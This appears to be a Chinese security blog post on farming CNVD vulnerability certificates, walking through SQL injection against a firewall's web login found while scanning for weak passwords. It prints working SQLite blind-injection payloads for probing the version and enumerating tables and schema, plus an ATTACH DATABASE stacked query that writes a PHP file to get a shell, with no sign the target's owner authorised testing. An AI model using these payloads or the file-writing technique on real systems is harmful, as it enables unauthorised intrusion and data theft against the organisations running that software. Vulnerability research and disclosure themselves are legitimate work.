声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
帅gei哥们给我这个一"坤"年的实习生点点星标,谢谢大家!
00X0:获取cnvd证书的条件
前言:最近看大家都很喜欢去挖cnvd,这里所以教大家一些挖掘证书的小技巧,为了知己知彼,方能百战百胜,所以要先看我自己收集到的获取证书的条件如下:
资产大于5000w开发的cms的中高危漏洞,并且评分大于4.0,黑盒案例满10起三大运营商和中国铁塔高危漏洞,例如:sql,rce,文件上传部委级别高危漏洞,例如:sql,rce,文件上传有源码的白盒审计出来的漏洞(这个还没有尝试过,听说可以)不要问我为什么知道这些,都是ikun哥哥告诉我的~
00X1:cnvd证书的挖掘小技巧
欸,刚刚不是知道了获取的条件了嘛,那接下来直接开挖!但是了,可能还是有些同学有点懵逼,无从下手,这里给大家讲一点怎么水几个垃圾的cnvd的技巧。
比如:一些硬件设备的弱口令,这个是不管是不是5000w都可以有证书,比如摄像头弱口令,路由器呀等等带硬件的弱口令,其实都可以有证书,这不就是有手就行?曾经看有人了水了10多本,当然本人也水了一个hhh
00X2:从sqlite的注入到捡本cnvd
1.好了,回归正题,讲一下我是怎么捡本cnvd的过程。刚刚不是想去挖一些硬件的弱口令,然后发现了下面的资产
2.看了是防火墙的web,本来想着搞本弱口令的cnvd,发现admin,123456,都尝试了,刚开始以为gg了,谁知道打个单引号报错了,这不妥妥的注入?
3.然后直接构造万能密码1‘or'1'='1'or'1,发现不行,看了一下报错的关键字,php的网站,这一看就是mysql的,直接打poc是可以成功的
'-1/case when substr('f',1,1)!='f' then 1 else 0 end-'
4.但是勒,一直死活跑不出user和database()的值,真他妈无语,后面再重新看了看报错,原来是他妈sqlite的,恍然大悟!sqlite的特性是没有系统信息函数,所以只能跑存在表然后再去跑表里面的内容。
只有跑存在表的- - - ->到盲注表里面的信息所以该怎么证明存在sql勒?简单,ikun告诉我直接跑版本就行了
版本函数:sqlite_version()poc:'-1/case when substr(sqlite_version(),1,1)!='1' then 1 else 0 end-'
成功!找十个案例验证即可,跑出版本信息为:2.8.17
00X3:sqlite的注入后利用
1.你以为证明存在sql注入就完事了?就结束了?拜托,能不能学一下后利用怎么跑所有数据呀和怎么getshell,别天天以为自己跑个user或者database的第一位就完事了,能不能学学如何后利用?不要变成只会注入的fw。。。。
2.sqlite的利用总结:先跑系统表里面有哪些表,然后跑表里面字段,再跑信息
sqlite_master 是一个特殊的 SQLite 系统表,用于存储数据库中的元数据信息。它是一个只读表,包含了数据库中的所有表、视图、索引和触发器的定义。爆破表名:'-1/case when substr((select name from sqlite_master where type='table' limit 0,1),1,1)!='f' then 1 else 0 end-'表名:fwfilt
通过表名爆破字段:'-1/case when substr((select sql from sqlite_master where type='table' and name='fwfilt' limit 0,1),1,1)!='f' then 1 else 0 end-'
通过表获取字段信息大家应该都知道了吧,cxk都知道,你不会还不会吧?select * from test where id =1 ;ATTACH DATABASE 'C:\Sqlite\xiaozi.php' AS pwn ; CREATE TABLE pwn.exp (dataz text) ; INSERT INTO pwn.exp (dataz) VALUES (' <?php phpinfo(); ?> '); --https://blog.51cto.com/bypass/6238043https://www.anquanke.com/post/id/85552
00X4:轻松捡到一本证书
后记:挖cnvd还是很简单的,除了一些技巧,重要的还是你对渗透的知识储备,就比如这个sqlite注入你有了解过嘛?了解之后有后利用嘛?所以也想告诉大家细心,多学,多复现,多总结,这样子你肯定能挖到cnvd证书,为什么勒,因为坤坤是这么告诉我的
最近更自己的文章很少,真的很不好意思,都是转载别人的文章,感觉有点对不起大家对我的关注,之后会多更新一些干货,希望大家督促我一起共同进步,个人wx:azz_789
00X5:粉丝留言回复
我知道大部分的粉丝都是喜欢搞技术的,但我也希望你们能有自己的职业规划,你们跟我聊网安规划我也是欢迎的,跟我聊过天都知道,深情哥只要看到有关网安的信息不管是什么都会回你。尤其是那种不考研的一定要把握好秋招和应届生的身份,争取找个好工作,这也是我开这个专题的意义。
1.前几天有个大三的跟我聊了一下,也希望大家能从我给他的建议中受到启发
2.他应该是想问问我该去什么培训机构线下培训一下,他毕竟大三了,现在也应该可以实习了,我是建议他可以边学小迪然后投投实习,毕竟快hvv了,大家懂都都懂,现在跑去面实习岂不是很容易进,毕竟他是本科嘛。背背面试题投投hvv也是可以的,挣了钱再去培训岂不是更好,当然也要根据自身的需求去培训,就比如你自学学不下去,那你只能去线下培训了,都是因人而异。
3.最近看了关于衡阳网安发布的攻防演练,我觉得一些大一大二或者大三的搞网安的可以去参加试试,为什么了?
第一,这不就是一次免费的攻防项目经验第二,提前接触攻防,快人一步,校招脱颖而出嘿嘿嘿第三,那边要拿奖才能报销食宿,建议离的近的可以参加第四,不知道会不会跟hvv冲突,看你们自己安排
4.原文链接如下
说这么多,其实是希望大家多参加比赛,多实践,到时候进个好点的甲方或者安全厂
你自己想想学历又比不过人家,只能另辟蹊径了呀!
希望大家越来越好,我是深情哥欢迎一起吹牛皮。
https://mp.weixin.qq.com/s/-Bdd38QtpHUuF_s3JgqpAw
原文始发于微信公众号(0x6270安全团队):轻松捡本cnvd证书之ikun都会的注入
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论